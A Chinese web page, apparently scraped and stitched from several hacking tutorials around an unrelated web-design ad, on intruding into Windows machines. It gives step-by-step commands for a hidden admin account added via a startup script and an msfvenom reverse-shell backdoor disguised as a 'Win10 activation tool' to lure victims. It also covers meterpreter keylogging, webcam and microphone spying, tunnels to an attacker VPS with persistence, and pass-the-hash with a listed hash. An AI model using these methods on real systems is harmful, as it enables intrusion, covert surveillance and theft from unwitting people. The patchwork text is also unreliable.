如何越過網(wǎng)段進(jìn)行內(nèi)網(wǎng)滲透？

首先你要知道跟你同一個(gè)局域網(wǎng)的用戶是否開啟了防火墻或者禁止了同一局域網(wǎng)的共享和安全！如果對(duì)方禁用了共享，那你是進(jìn)不去的，只有用歪門邪道進(jìn)去了方法如下

創(chuàng)新互聯(lián)專業(yè)為企業(yè)提供銅梁網(wǎng)站建設(shè)、銅梁做網(wǎng)站、銅梁網(wǎng)站設(shè)計(jì)、銅梁網(wǎng)站制作等企業(yè)網(wǎng)站建設(shè)、網(wǎng)頁設(shè)計(jì)與制作、銅梁企業(yè)網(wǎng)站模板建站服務(wù)，10年銅梁做網(wǎng)站經(jīng)驗(yàn)，不只是建網(wǎng)站，更提供有價(jià)值的思路和整體網(wǎng)絡(luò)服務(wù)。

一、 在該機(jī)創(chuàng)建一個(gè)批處理文件，內(nèi)容如下：

net user admin /add

net localgroup administrators admin /add

將上述的批處理文件保存為 admin.bat.

注：上述批處理文件作用是創(chuàng)建一個(gè)名為 admin 的管理員帳戶(密碼為空)。

二、將此批處理文件作為Windows 的開機(jī)啟動(dòng)腳本。

1、在 運(yùn)行 對(duì)話框中輸入 gpedit.msc

2、定位到 計(jì)算機(jī)配置一Windows設(shè)置一腳本 (啟動(dòng)/關(guān)機(jī)), 雙擊右邊窗口的 啟動(dòng),在其中添加先前創(chuàng)建的 admin.bat。

3、重新啟動(dòng)計(jì)算機(jī)(兩次)，系統(tǒng)便有了一個(gè)名為admin 的管理員

上述操作在Windows 2000/XP中可行，但要保證帳戶可以訪問注冊(cè)表,組策略(創(chuàng)建帳戶的操作實(shí)際上也就是在注冊(cè)表中添加相應(yīng)的項(xiàng)和值),而Windows中的缺省的Guest/受限帳戶并無此限制。

或許，我們并不需要用Guest帳戶去創(chuàng)建一個(gè)管理員，但設(shè)想如果某個(gè)程序只有管理員可執(zhí)行，是否也就可用上述的方法來實(shí)現(xiàn)呢？

小結(jié):Windows系統(tǒng)默認(rèn)對(duì)Guest/受限帳戶的限制只是表面上的，作為一個(gè)有經(jīng)驗(yàn)的系統(tǒng)管理員，要做的事情還很多，起碼應(yīng)該禁止受限用戶訪問/修改注冊(cè)表,組策略等。

Kali利用msf滲透Windows電腦（超詳細(xì)）

前言

最近整理了一些 奇安信華為深信服大佬 的課件資料+大廠面試課題，想要的可以私信自取， 無償贈(zèng)送 給粉絲朋友~

msfvenom a Metasploit standalone payload generator，Also a replacement for msfpayload and msfencode.是用來生成后門的軟件。

MSFvenom是Msfpayload和Msfencode的組合，將這兩個(gè)工具都放在一個(gè)Framework實(shí)例中。自2015年6月8日起，msfvenom替換了msfpayload和msfencode。

演示環(huán)境

使用Kali 2021.3進(jìn)行演示操作

目標(biāo)靶機(jī)： Win10專業(yè)版

軟件：msfvenom、msfconsole（Kali系統(tǒng)內(nèi)置）

1.進(jìn)入管理員模式

命令： sudo su

解釋： 不在管理員模式下運(yùn)行可能會(huì)有權(quán)限不夠的提示，為了避免命令執(zhí)行失敗，在管理員下運(yùn)行以下命令

命令： msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口號(hào) –f exe –o 文件名.exe

解釋： 本地ip寫自己Kali的IP地址，用ifconfig就能查看自己Kali的IP地址

本地端口自己隨便設(shè)置一個(gè)沒有被占用的端口號(hào)，如果端口號(hào)被占用那么文件會(huì)生成失敗，換一個(gè)端口號(hào)就性

文件名可以隨便寫自己喜歡的名字，比如寫Win10激活工具，可能更容易讓目標(biāo)主機(jī)上鉤

當(dāng)然MSF也可以用來滲透手機(jī)、mac、Linux等

接下來運(yùn)行命令生成文件

默認(rèn)生成的文件在根目錄下

把剛才生成的文件放到目標(biāo)靶機(jī)Win10系統(tǒng)中

命令： msfconsole

(1)命令： use exploit/multi/handler（選擇模塊）

(2)命令： set payload windows/meterpreter/reverse_tcp（選擇攻擊模塊）

(3)命令： set LhOST 192.168.32.1（填寫自己主機(jī)的IP地址）

(4)命令： set lport 1111（填寫剛才生成文件時(shí)的端口號(hào)）

(5)命令： show options（查看設(shè)置參數(shù)）

(6)命令： exploit -z -j（后臺(tái)執(zhí)行）

我們這里也可以把這個(gè)程序偽裝一下，把他的圖標(biāo)改一下，或者把它捆綁在某些軟件上面，當(dāng)用戶打開就自動(dòng)安裝到對(duì)方電腦上面

(1)命令： sessions （查看上鉤的用戶）

(2)命令： sessions -i 1 （選擇需要攻擊的用戶，這里選擇第 1 個(gè)

命令： run vnc -i

cmd指令:

cat 讀取文件內(nèi)容到屏幕

cd 更改目錄

checksum 檢索文件的校驗(yàn)和

cp 將源復(fù)制到目標(biāo)

del 刪除指定文件

dir 列出文件（ls 的別名）

下載 下載文件或目錄

編輯 編輯文件

getlwd 打印本地工作目錄

getwd 打印工作目錄

lcd 更改本地工作目錄

lls 列出本地文件

lpwd 打印本地工作目錄

ls 列出文件

mkdir 創(chuàng)建目錄

mv 將源移動(dòng)到目標(biāo)

pwd 打印工作目錄

rm 刪除指定文件

rmdir 刪除目錄

search 搜索文件

show_mount 列出所有掛載點(diǎn)/邏輯驅(qū)動(dòng)器

upload 上傳文件或目錄

pkill 按名稱終止進(jìn)程

keyscan_start 開始捕獲擊鍵（開始鍵盤記錄）

keyscan_dump 轉(zhuǎn)儲(chǔ)按鍵緩沖（下載鍵盤記錄）

keyscan_stop 停止捕獲擊鍵（停止鍵盤記錄）

record_mic X秒從默認(rèn)的麥克風(fēng)record_mic音頻記錄（音頻錄制）

webcam_chat 開始視頻聊天（視頻，對(duì)方會(huì)有彈窗）

webcam_list 單攝像頭（查看攝像頭列表）

webcam_snap 采取快照從指定的攝像頭（攝像頭拍攝一張照片）

webcam_stream 播放視頻流從指定的攝像頭（開啟攝像頭監(jiān)控）

enumdesktops 列出所有可訪問的桌面和窗口站（窗體列表）

getdesktop 得到當(dāng)前的Meterpreter桌面

reboot 重新啟動(dòng)遠(yuǎn)程計(jì)算機(jī)

shutdown 關(guān)閉遠(yuǎn)程計(jì)算機(jī)

shell 放入系統(tǒng)命令 shell

enumdesktops 列出所有可訪問的桌面和窗口站

getdesktop 獲取當(dāng)前的meterpreter桌面

idletime 返回遠(yuǎn)程用戶空閑的秒數(shù)

keyboard_send 發(fā)送擊鍵

keyevent 發(fā)送按鍵事件

keyscan_dump 轉(zhuǎn)儲(chǔ)擊鍵緩沖區(qū)

keyscan_start 開始捕獲擊鍵

keyscan_stop 停止捕獲擊鍵

mouse 發(fā)送鼠標(biāo)事件

screenshare 實(shí)時(shí)觀看遠(yuǎn)程用戶桌面

screenshot 抓取交互式桌面的屏幕截圖

setdesktop 更改 Meterpreters 當(dāng)前桌面

uictl 控制一些用戶界面組件

record_mic 從默認(rèn)麥克風(fēng)錄制音頻 X 秒

webcam_chat 開始視頻聊天

webcam_list 列出網(wǎng)絡(luò)攝像頭

webcam_snap 從指定的網(wǎng)絡(luò)攝像頭拍攝快照

webcam_stream 播放來自指定網(wǎng)絡(luò)攝像頭的視頻流

play 在目標(biāo)系統(tǒng)上播放波形音頻文件 (.wav)

getsystem 嘗試將您的權(quán)限提升到本地系統(tǒng)的權(quán)限

execute -f notepad 打開記事本

————————————————

原文鏈接：

滲透測(cè)試之操作系統(tǒng)識(shí)別

利用TTL起始值判斷操作系統(tǒng),不同類型的操作系統(tǒng)都有默認(rèn)的TTL值(簡陋掃描,僅作參考)

TTL起始值:Windows xp(及在此版本之前的windows)? 128 (廣域網(wǎng)中TTL為65-128)

Linux/Unix64(廣域網(wǎng)中TTL為1-64)

某些Unix:255

網(wǎng)關(guān):255

使用python腳本進(jìn)行TTL其實(shí)質(zhì)判斷

使用nmap識(shí)別操作系統(tǒng):nmap -O 192.168.45.129 #參數(shù)-O表示掃描操作系統(tǒng)信息,nmap基于簽名,指紋,特征,CPE編號(hào)等方法去判斷目標(biāo)系統(tǒng)的信息

CPE:國際標(biāo)準(zhǔn)化組織,制定了一套標(biāo)準(zhǔn),將各種設(shè)備,操作系統(tǒng)等進(jìn)行CPE編號(hào),通過編號(hào)可以查詢到目標(biāo)系統(tǒng)

使用xprobe2進(jìn)行操作系統(tǒng)識(shí)別,專門用來識(shí)別目標(biāo)操作系統(tǒng):xprobe2 192.168.45.129,但結(jié)果并不是很精確

被動(dòng)操作系統(tǒng)識(shí)別:不主動(dòng)向目標(biāo)主機(jī)發(fā)數(shù)據(jù)包,基于網(wǎng)絡(luò)監(jiān)聽原理

通過抓包分析,被動(dòng)掃描,使用kali中的p0f工具進(jìn)行網(wǎng)絡(luò)監(jiān)聽

p0f:p0f是一種被動(dòng)指紋識(shí)別工具，可以識(shí)別您連接的機(jī)器，連接到您的盒子的機(jī)器，甚至連接在盒子附近的機(jī)器，即使該設(shè)備位于數(shù)據(jù)包防火墻后面。

p0f的使用:只要接收到數(shù)據(jù)包就可以根據(jù)數(shù)據(jù)包判斷其信息,首先輸入p0f,然后在瀏覽器里面輸入目標(biāo)系統(tǒng)的網(wǎng)址,便會(huì)獲得目標(biāo)系統(tǒng)的信息

或者使用p0f結(jié)合ARP地址欺騙識(shí)別全網(wǎng)OS

snmp掃描:簡單網(wǎng)絡(luò)管理協(xié)議,明文傳輸,使用網(wǎng)絡(luò)嗅探也可獲取到信息

SNMP是英文"Simple Network Management Protocol"的縮寫，中文意思是"簡單網(wǎng)絡(luò)管理協(xié)議"。SNMP是一種簡單網(wǎng)絡(luò)管理協(xié)議，它屬于TCP/IP五層協(xié)議中的應(yīng)用層協(xié)議，用于網(wǎng)絡(luò)管理的協(xié)議。SNMP主要用于網(wǎng)絡(luò)設(shè)備的管理。由于SNMP協(xié)議簡單可靠 ，受到了眾多廠商的歡迎，成為了目前最為廣泛的網(wǎng)管協(xié)議。

snmp的基本思想是為不同種類、不同廠家、不同型號(hào)的設(shè)備定義一個(gè)統(tǒng)一的接口和協(xié)議，使管理員可以通過統(tǒng)一的外觀面對(duì)這些需要管理的網(wǎng)管設(shè)備進(jìn)行管理，提高網(wǎng)管管理的效率，簡化網(wǎng)絡(luò)管理員的工作。snmp設(shè)計(jì)在TCP/IP協(xié)議族上，基于TCP/IP協(xié)議工作，對(duì)網(wǎng)絡(luò)中支持snmp協(xié)議的設(shè)備進(jìn)行管理。

在具體實(shí)現(xiàn)上，SNMP為管理員提供了一個(gè)網(wǎng)管平臺(tái)(NMS)，又稱為管理站，負(fù)責(zé)網(wǎng)管命令的發(fā)出、數(shù)據(jù)存儲(chǔ)、及數(shù)據(jù)分析。被監(jiān)管的設(shè)備上運(yùn)行一個(gè)SNMP代理(Agent))，代理實(shí)現(xiàn)設(shè)備與管理站的SNMP通信。如下圖

管理站與代理端通過MIB進(jìn)行接口統(tǒng)一，MIB定義了設(shè)備中的被管理對(duì)象。管理站和代理都實(shí)現(xiàn)了相應(yīng)的MIB對(duì)象，使得雙方可以識(shí)別對(duì)方的數(shù)據(jù)，實(shí)現(xiàn)通信。管理站向代理申請(qǐng)MIB中定義的數(shù)據(jù)，代理識(shí)別后，將管理設(shè)備提供的相關(guān)狀態(tài)或參數(shù)等數(shù)據(jù)轉(zhuǎn)換為MIB定義的格式，應(yīng)答給管理站，完成一次管理操作。

已有的設(shè)備，只要新加一個(gè)SNMP模塊就可以實(shí)現(xiàn)網(wǎng)絡(luò)支持。舊的帶擴(kuò)展槽的設(shè)備，只要插入SNMP模塊插卡即可支持網(wǎng)絡(luò)管理。網(wǎng)絡(luò)上的許多設(shè)備，路由器、交換機(jī)等，都可以通過添加一個(gè)SNMP網(wǎng)管模塊而增加網(wǎng)管功能。服務(wù)器可以通過運(yùn)行一個(gè)網(wǎng)管進(jìn)程實(shí)現(xiàn)。其他服務(wù)級(jí)的產(chǎn)品也可以通過網(wǎng)管模塊實(shí)現(xiàn)網(wǎng)絡(luò)管理，如Oracle、WebLogic都有SNMP進(jìn)程，運(yùn)行后就可以通過管理站對(duì)這些系統(tǒng)級(jí)服務(wù)進(jìn)行管理。

使用UDP161端口(服務(wù)端),162端口(客戶端),可以監(jiān)控網(wǎng)絡(luò)交換機(jī),防火墻,服務(wù)器等設(shè)備

可以查看到很多的信息,但經(jīng)常會(huì)被錯(cuò)誤配置,snmp里面

有一些默認(rèn)的Community,分別是Public/private/manager

如果目標(biāo)的community是public,那么就可以發(fā)送SNMP的查詢指令,對(duì)IP地址進(jìn)行查詢

在kali中存在對(duì)snmp掃描的工具,為onesixtyone

在Windows XP系統(tǒng)安裝SNMP協(xié)議:

1,在運(yùn)行框輸入appwiz.cpl

2,找到管理和監(jiān)控工具,雙擊

3,兩個(gè)都勾選,然后點(diǎn)OK

使用onesixtyone對(duì)目標(biāo)系統(tǒng)進(jìn)行查詢:命令為:onesixtyone 192.168.45.132? public

onesixtyone -c? 字典文件? -I? 主機(jī)? -o 倒入到的文件 -w 100

onesixtyone默認(rèn)的字典在:/usr/share/doc/onesixtyone/dict.txt

使用snmpwalk查找目標(biāo)系統(tǒng)的SNMP信息:snmpwalk 192.168.45.129 -c public -b 2c

snmpcheck -t? 192.168.45.129

snmpcheck -t? 192.168.45.129 -w? 參數(shù)-w檢測(cè)是不是有可寫權(quán)限

SMB協(xié)議掃描:server message block,微軟歷史上出現(xiàn)安全問題最多的協(xié)議,在Windows系統(tǒng)上默認(rèn)開發(fā),實(shí)現(xiàn)文件共享

在Windows系統(tǒng)下管理員的Sid=500,

SMB掃描:nmap -v -p 139,445 192.168.45.132 --open 參數(shù)-v表示顯示詳細(xì)信息,參數(shù)--open表示顯示打開的端口

nmap 192.168.45.132 -p 139,445 --script=smb-os-discovery.nse

smb-os-discovery.nse:這個(gè)腳本會(huì)基于SMB協(xié)議去判別操作系統(tǒng),主機(jī)名,域名,工作組和當(dāng)前的時(shí)間

nmap -v -P 139,445 --script=smb-check-vulns? --script-args=unsafe=1 192.168.45.132

腳本smb-check-vulns:檢查已知的SMB重大的漏洞

后面給腳本定義參數(shù) --script-args=unsafe=1,unsafe可能會(huì)對(duì)系統(tǒng)有傷害,導(dǎo)致宕機(jī),但要比safe準(zhǔn)確

nbtscan -r 192.168.45.0/24參數(shù)-r使用本地137端口進(jìn)行掃描,兼容性較好,可以掃描一些老版本的Windows

nbtscan可以掃描同一局域網(wǎng)不同的網(wǎng)段,對(duì)于局域網(wǎng)掃描大有裨益

enum4linux -a 192.168.45.132 :

SMTP掃描:目的在于發(fā)現(xiàn)目標(biāo)系統(tǒng)的郵件賬號(hào)

使用nc -nv 192.168.45.132 25

VRFY root :確定是不是有root用戶

nmap掃描SMTP服務(wù):

nmap smtp.163.com -p25 --script=smtp-enum-users.nse --script-args=smtp-enum-

users.methods={VRFY}

腳本smtp-enum-users.nse用于發(fā)現(xiàn)遠(yuǎn)程系統(tǒng)上所有user的賬戶

nmap smtp.163.com -p25 --script=smtp-open-relay.nse,如果郵件服務(wù)器打開了open-relay功能,那么黑客可以拿管理員的郵箱去發(fā)送釣魚郵件

防火墻識(shí)別:通過檢查回包,可能識(shí)別端口是否經(jīng)過防火墻過濾

設(shè)備多種多樣,結(jié)果存在一定的誤差

第一種情況:攻擊機(jī)向防火墻發(fā)送SYN數(shù)據(jù)包,防火墻沒有給攻擊機(jī)回復(fù),攻擊機(jī)再發(fā)送ACK數(shù)據(jù)包,若防火墻返回RST數(shù)據(jù)包,那么證明該端口被防火墻過濾

第二種類似

第三種:攻擊機(jī)向防火墻發(fā)送SYN數(shù)據(jù)包,防火墻返回SYN+ACK或者SYN+RST數(shù)據(jù)包,攻擊者再發(fā)送ACK數(shù)據(jù)包,若防火墻返回RST數(shù)據(jù)包,那么就可以證明防火墻對(duì)于該端口沒被過濾.unfiltered=open

第四種情況類似,證明該端口是關(guān)閉的,或者防火墻不允許其他用戶訪問該端口

使用python腳本去判定:

使用nmap去進(jìn)行防火墻識(shí)別:nmap有系列防火墻過濾檢測(cè)功能

nmap -sA 192.168.45.129 -p 22 參數(shù)-sA表示向目標(biāo)主機(jī)發(fā)送ACK數(shù)據(jù)包,參數(shù)-sS表示向目標(biāo)發(fā)送SYN數(shù)據(jù)包,通過抓包分析收到的數(shù)據(jù)包判斷是否有防火墻檢測(cè)功能

負(fù)載均衡識(shí)別:負(fù)載均衡可以跟為廣域網(wǎng)負(fù)載均衡和服務(wù)器負(fù)載均衡

在kali中使用lbd命令用于識(shí)別負(fù)載均衡機(jī)制

格式:lbd +域名/IP地址,如lbd

WAF識(shí)別:WEB應(yīng)用防火墻,在kali中最常用的waf檢測(cè)掃描器

輸入:wafw00f -l:可以檢測(cè)出這個(gè)工具可以檢測(cè)到的waf類別

探測(cè)微軟公司的WAF:wafw00f?

使用nmap中的腳本去掃描目標(biāo)網(wǎng)站使用的waf信息:nmap? ? --script=http-waf-detect.nse

腳本詳情:

nmap補(bǔ)充:

參數(shù):-iL:把IP地址做成文件,使用該參數(shù)掃描這個(gè)文件里面的IP! nmap -iL ip.txt

-iR:隨機(jī)選取目標(biāo)進(jìn)行掃描,后面跟需要掃描的主機(jī)個(gè)數(shù),例:nmap -iR? 20? -p 22:隨機(jī)掃描20個(gè)主機(jī)的22號(hào)端口,默認(rèn)發(fā)送SYN數(shù)據(jù)包

參數(shù)-sn表示不做端口掃描

參數(shù)-Pn表示跳過主機(jī)發(fā)現(xiàn),掃描所有在線的主機(jī),掃防火墻幫助很大

參數(shù)p0表示進(jìn)行IP協(xié)議ping

參數(shù)-n/-R表示不進(jìn)行DNS解析

參數(shù)--dns-servers表示指定一個(gè)DNS服務(wù)器去解析

參數(shù)--traceroute表示進(jìn)行路由追蹤

參數(shù)-sM表示發(fā)送ACK+FIN

參數(shù)-sF發(fā)送FIN數(shù)據(jù)包

參數(shù)-sV根據(jù)特征庫匹配開放的服務(wù),加上參數(shù)--version-intensity 后面加等級(jí),0最小,9最完善

參數(shù)--script=腳本名

參數(shù)--script=arge.腳本.腳本名

參數(shù)--script-updatedb更新腳本

參數(shù)--script-help=腳本名? 查看腳本的信息

參數(shù)-O檢測(cè)操作系統(tǒng)類型

參數(shù)--scan-delay 表示每次探測(cè)間隔多長時(shí)間,后面?zhèn)€時(shí)間,如nmap 192.168.45.132 --scan-delay 10s :間隔十秒

參數(shù)-f表示設(shè)置MTU最大傳輸單元

參數(shù)-D表示偽造源地址,增加一些虛假的掃描IP,例:nmap? -D 192.138.1.1,192.151.141.4? 172.16.45.1? :掃描172.16.45.1主機(jī),用這兩個(gè)地址做干擾,防止被發(fā)現(xiàn)

參數(shù)-S表示偽造源地址,但要獲取得到的IP地址,那么就得登陸到偽造的IP上

參數(shù)--proxies指定代理服務(wù)器

參數(shù)--spoof-mac欺騙mac地址 nmap 10.1.1.1? --spoof-mac=00:11:22:33:44:55

參數(shù)-6表示掃描IPv6

內(nèi)網(wǎng)滲透-代理篇

最近參與內(nèi)網(wǎng)滲透比較多，認(rèn)知到自己在會(huì)話維持上過于依賴web服務(wù)，web服務(wù)一旦關(guān)閉，便失去了唯一的入口點(diǎn)。

本次以遠(yuǎn)程桌面連接來進(jìn)行說明，介紹幾種常用的連接方式。

本次目標(biāo)主機(jī)ip為：172.16.86.153

使用條件：服務(wù)器通外網(wǎng)，擁有自己的公網(wǎng)ip

msf是我進(jìn)行內(nèi)網(wǎng)滲透中用的最多的工具，它內(nèi)置了很多強(qiáng)大的功能，用起來相當(dāng)方便。

msf的meterpreter內(nèi)置了端口轉(zhuǎn)發(fā)功能，可以把內(nèi)網(wǎng)的端口轉(zhuǎn)發(fā)到本地。

轉(zhuǎn)發(fā)目標(biāo)主機(jī)的3389遠(yuǎn)程桌面服務(wù)端口到本地的8888，使用linux中的rdesktop連接本地的8888端口。

msf內(nèi)置了socks模塊，在session但基礎(chǔ)上配置路由，調(diào)用即可使用，但是速度和穩(wěn)定性都很差，不做詳細(xì)介紹。

使用條件：服務(wù)器通外網(wǎng)，擁有自己的公網(wǎng)ip

lcx是一個(gè)經(jīng)典的端口轉(zhuǎn)發(fā)工具，直接把3389轉(zhuǎn)發(fā)到公網(wǎng)的vps上。

通過大馬上傳lcx.exe,執(zhí)行系統(tǒng)命令，其中1.1.1.1是vps的公網(wǎng)ip。

因?yàn)槲夜W(wǎng)vps使用的是linux的系統(tǒng)，lcx對(duì)應(yīng)linux的工具為portmap 。

p1為監(jiān)聽的端口，p2為轉(zhuǎn)發(fā)到的端口。

成功監(jiān)聽到轉(zhuǎn)發(fā)出的3389端口。

直接使用遠(yuǎn)程桌面服務(wù)連接1.1.1.1:33889

基于web服務(wù)的socks5隧道的優(yōu)點(diǎn)是，在內(nèi)網(wǎng)服務(wù)器不通外網(wǎng)的情況下也能正常使用。

常用的工具有：reGeorg，reDuh，Tunna和Proxifier。

本次只介紹reGeorg的具體用法。

選擇對(duì)應(yīng)腳本的tunnel上傳到服務(wù)器。

訪問上傳文件，顯示如下表示成功。

打開Proxifier，更改為腳本指定的端口。

本地電腦成功通過socks5帶進(jìn)了目標(biāo)主機(jī)的內(nèi)網(wǎng)。（若失敗，可能是某些防護(hù)檢測(cè)到了異常流量，可采用reDuh）

本地電腦直接遠(yuǎn)程連接目標(biāo)主機(jī)的內(nèi)網(wǎng)ip。

使用條件:目標(biāo)主機(jī)通外網(wǎng)，擁有自己的公網(wǎng)ip

選擇對(duì)應(yīng)主機(jī)操作系統(tǒng)的執(zhí)行文件。

目標(biāo)主機(jī)為windows系統(tǒng)，選擇上傳ew_for_Win.exe文件。

公網(wǎng)vps使用ew_for_linux64文件。

首先在公網(wǎng)vps上執(zhí)行：

-l為Proxifier連接的端口，-e為目標(biāo)主機(jī)和vps的通信端口。

然后在目標(biāo)主機(jī)中執(zhí)行:

socks5隧道建立成功，成功把自己的主機(jī)帶進(jìn)目標(biāo)內(nèi)網(wǎng)。

使用Proxifier，配置ip和連接端口。

連接遠(yuǎn)程桌面成功。

傳送門

使用條件:目標(biāo)主機(jī)通外網(wǎng)，擁有自己的公網(wǎng)ip

首先需要在公網(wǎng)服務(wù)器搭建服務(wù)端，搭建方法參考: 傳送門

要注意的是，客戶端和服務(wù)端的版本號(hào)要一致，否則無法正常使用。

對(duì)frpc.ini進(jìn)行配置，為了保證搭建的隧道不對(duì)他人惡意利用，加入賬戶密碼進(jìn)行驗(yàn)證。

上傳frpc.exe和frpc.ini到目標(biāo)服務(wù)器上,直接運(yùn)行frpc.exe（在實(shí)戰(zhàn)中可能會(huì)提示找不到配置文件，需要使用-c參數(shù)指定配置文件的路徑frpc.exe -c 文件路徑）

公網(wǎng)vps主機(jī)上運(yùn)行frps。

隧道建立成功，連接遠(yuǎn)程桌面。

類似的工具還有：sSocks，Termite等，不需要每種都掌握，有自己用的順手的就行。

一般在網(wǎng)站服務(wù)的web服務(wù)關(guān)閉后，服務(wù)器重啟后，大部門后門都會(huì)失效，這時(shí)需要用到系統(tǒng)服務(wù)封裝工具。

以NSSM來進(jìn)行示例，封裝frpc為系統(tǒng)服務(wù)，建立持久的socks5隧道。

啟動(dòng)nssm圖形化界面。

選擇想要組冊(cè)服務(wù)的exe應(yīng)用。

設(shè)置服務(wù)的名字。直接點(diǎn)擊install service，如下表示注冊(cè)服務(wù)成功。

狀態(tài)設(shè)置為啟動(dòng)，重啟電腦進(jìn)行測(cè)試，重啟后frpc.exe自動(dòng)運(yùn)行，成功和frps連接。

本次列舉了一些常用的工具，還有很多工具沒有列舉到，

功能原理都是大同小異，有那么幾個(gè)用的順手就好。

橫向滲透之Pass The Hash

在上一章總結(jié)了windows抓取hash的一些方式。在實(shí)際場(chǎng)景中，我們需要更快的擴(kuò)大戰(zhàn)果，獲取更多控制權(quán)限，以及定位域環(huán)境。

橫向滲透：就是在得到一臺(tái)主機(jī)的控制權(quán)限后，將該主機(jī)作為突破口、跳板，利用既有的資源嘗試獲取更多的憑據(jù)、更高的權(quán)限，進(jìn)而達(dá)到控制整個(gè)內(nèi)網(wǎng)、擁有最高權(quán)限。

Pass The Hash 哈希傳遞簡稱PTH，可以在不需要明文密碼的情況下，利用LM HASH和NTLM HASH直接遠(yuǎn)程登錄。攻擊者不需要花費(fèi)時(shí)間來對(duì)hash進(jìn)行爆破，在內(nèi)網(wǎng)滲透里非常經(jīng)典。

常常適用于域/工作組環(huán)境。

靶機(jī)：windows server 2008

IP：10.211.55.19

domain：workgroup

user：administrator

pass：cseroad@2008

NTLM-Hash：82c58d8cec50de01fd109613369c158e

psexec類工具大同小異，大部分工具都是通過psexec來執(zhí)行的。原理是： 通過ipc$連接，將psexesvc.exe釋放到目標(biāo)機(jī)器，再通過服務(wù)管理SCManager遠(yuǎn)程創(chuàng)建psexecsvc服務(wù)，并啟動(dòng)服務(wù)。然后通過psexec服務(wù)運(yùn)行命令，運(yùn)行結(jié)束后刪除該服務(wù)。

如：Metasploit psexec，Impacket psexec，pth-winexe，Empire Invoke-Psexec

缺點(diǎn)：容易被殺軟檢測(cè)到

優(yōu)點(diǎn)：可以直接獲取system權(quán)限

因?yàn)槭忻婀ぞ弑容^多，只kali就自帶有很多。所以這里以好用、批量為準(zhǔn)則選擇了幾款工具。

mimikatz中pth功能的原理：

windows會(huì)在lsass中緩存hash值，并使用它們來ntlm認(rèn)證，我們?cè)趌sass中添加包含目標(biāo)賬號(hào)hash的合法數(shù)據(jù)結(jié)構(gòu)，就可以使用類似dir這些命令進(jìn)行認(rèn)證。

正常訪問server 2008 的盤符是需要用戶名密碼的。

在windows7上經(jīng)過pth之后就不需要密碼就可以遠(yuǎn)程連接。

將獲取的hash添加進(jìn)lsass中。

在windows 7 上執(zhí)行以下命令：

執(zhí)行后會(huì)彈出cmd。在cmd下執(zhí)行 net use \\10.211.55.19\c$ 命令就可以遠(yuǎn)程連接。

擴(kuò)展：

假如我們繼續(xù)探測(cè)到10.211.55.8使用的是同一個(gè)hash值。我們嘗試使用遠(yuǎn)程共享c盤和schtasks 定時(shí)計(jì)劃任務(wù)執(zhí)行獲取一個(gè)session。

powershell.bat為

當(dāng)重啟10.211.55.8機(jī)器后，metasploit可得到session

筆者經(jīng)常使用時(shí)的是這三個(gè)模塊

以exploit/windows/smb/psexec模塊為例

值得一說的是smbpass配置項(xiàng)支持明文密碼也支持hash(LM-Hash:NTLM-Hash)

成功返回system權(quán)限。

CobalStrike 同樣有psexec選項(xiàng)。

在得到一個(gè)beacon的基礎(chǔ)上，先在該網(wǎng)段portscan，探測(cè)存活主機(jī)后。

選擇View--Target--Login--psexec，可批量選擇主機(jī)pth。

選擇pth的用戶名和hash值。

從執(zhí)行的命令看得出依然利用的mimikatz。執(zhí)行成功后返回system權(quán)限。

該工具可以對(duì)C段主機(jī)批量pth。

項(xiàng)目在 github

在kali上直接apt就可以安裝

對(duì)工作組批量pth命令如下

測(cè)試的時(shí)候發(fā)現(xiàn)某些命令執(zhí)行后沒有回顯。

更多資料參考：

CrackMapExec：域環(huán)境滲透中的瑞士軍刀

紅隊(duì)測(cè)試工具-CrackMapExec-遠(yuǎn)程執(zhí)行Windows命令

wmi內(nèi)置在windows操作系統(tǒng)，用于管理本地或遠(yuǎn)程的 Windows 系統(tǒng)。wmiexec是對(duì)windows自帶的wmic做了一些強(qiáng)化。攻擊者使用wmiexec來進(jìn)行攻擊時(shí)，不會(huì)記錄日志，不會(huì)寫入到磁盤，具有極高的隱蔽性。

安裝成功后，切換到examples目錄下

運(yùn)行命令為

先加載Invoke-WMIExec.ps1腳本，再加載Invoke-TheHash.ps1腳本，因?yàn)镮nvoke-TheHash 里要用到 Invoke-WMIExec方法

如果要執(zhí)行系統(tǒng)命令。可以加-Command 參數(shù)

執(zhí)行后該進(jìn)程會(huì)在后臺(tái)運(yùn)行，可以結(jié)合定時(shí)任務(wù)執(zhí)行嘗試反彈shell。

在測(cè)試中發(fā)現(xiàn)，在打了kb2871997 這個(gè)補(bǔ)丁后，常規(guī)的Pass The Hash已經(jīng)無法成功，但默認(rèn)的Administrator(SID 500)賬號(hào)例外，利用這個(gè)賬號(hào)仍可以進(jìn)行Pass The Hash遠(yuǎn)程ipc連接。

以上所有操作均針對(duì)的SID 500。

內(nèi)網(wǎng)滲透之PTHPTTPTK

橫向移動(dòng)

丟掉PSEXEC來橫向滲透

看黑客怎么使用Metasploit進(jìn)行滲透windows7的

很多朋友對(duì)使用Metasploit利用后門程序進(jìn)行滲透windows7都比較感興趣，針對(duì)這些以下業(yè)內(nèi)相關(guān)專家就給大家介紹下，當(dāng)下黑客怎么利用Metasploit進(jìn)行滲透windows7的。設(shè)定目標(biāo)主機(jī)為：cn_win7_x86_7601虛擬機(jī)，地址為：192.168.0.116；而本地主機(jī)就為：192.168.0.149。方法步驟一：黑客用Msfpayload直接生成相關(guān)的后門程序，如下圖。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149xsteup.exe方法步驟二：黑客直接就能進(jìn)入所在的目錄并將屬性進(jìn)行修改，換為允許以程序執(zhí)行文件，詳細(xì)如下圖。進(jìn)入所在目錄，修改屬性：選擇“允許以程序執(zhí)行文件”,這時(shí)候也可以做一些免殺方法步驟三：接著黑客就打開msfconsole并加載exploit/multi/handler模塊并進(jìn)行設(shè)置本地主機(jī)，最后就能開始進(jìn)行監(jiān)聽了，詳細(xì)情況如下圖。打開msfconsole，加載exploit/multi/handler模塊，設(shè)置本地主機(jī)；然后開始監(jiān)聽：exploit-z-j：方法步驟四：黑客需要能將程序直接拷貝都目標(biāo)主機(jī)中并進(jìn)行執(zhí)行。方法步驟五：以上步驟全部完成后黑客就能通過后門程序反向連接到msf，用msf就能發(fā)起第2次的攻擊然后使用客戶端也就是后門程序就能連接都服務(wù)端msf，詳細(xì)的如下圖。Meterpreter就是metasploit框架中的一個(gè)擴(kuò)展模塊，因此的話溢出成功后黑客就能攻擊載荷進(jìn)行使用，一旦攻擊載荷在溢出攻擊成功后就能再返回一個(gè)控制通道，這樣就能將它作為攻擊載荷成功獲得目標(biāo)系統(tǒng)的一個(gè)meterpretershell的鏈